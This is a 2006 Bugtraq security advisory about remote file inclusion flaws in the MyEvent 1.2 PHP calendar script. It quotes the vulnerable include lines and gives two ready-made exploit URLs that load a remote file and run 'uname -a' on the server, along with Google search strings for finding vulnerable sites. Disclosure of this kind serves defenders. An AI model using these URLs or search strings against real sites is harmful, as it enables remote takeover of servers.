MyEvent Remote File Execution And XSS Attacking

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MyEvent Remote File Execution And XSS Attacking
From: botan@xxxxxxxxxxxxx
Date: 16 Apr 2006 18:42:04 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Website : http://mywebland.com/
Script : MyEvent 
Version : 1.2
Risk : High
Class : Remote 
Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends
Google look for :) = "MyEvent 1.2 " or "/calendar/myevent.php"

I. Remote Code Execution 

This is script to very big high it bug being found. 

"Event.php" remote code execution :

global $myevent_path;

include_once $myevent_path."includes/template.php";
$template = new Template($myevent_path."templates/") ;
$template->set_filenames(array(
'event' => 'event.tpl',
?>

Did you see the "myevent_path" :) 


http://www.site.com/[path]/event.php?myevent_path=http://www.site.com/x.txt?&cmd=uname
 -a

"&#304;nitialize.php" Remote Code :

include $myevent_path."config.php";
include $myevent_path.$language;
include_once $myevent_path."includes/template.php" ;

$db = mysql_connect($host,$login,$password);
mysql_select_db($base,$db);
>

Yep now code

http://www.site.com/[path]/initialize.php?myevent_path=http://www.site.com/x.txt?&cmd=uname
 -a

Prev by Date: Re: Snipe Gallery <= 3.1.4 Multiple XSS
Next by Date: BetaBoard Cross Site Scripting vulnerability
Previous by thread: Calendarix "yearcal.php" XSS Attacking
Next by thread: BetaBoard Cross Site Scripting vulnerability
Index(es):
- Date
- Thread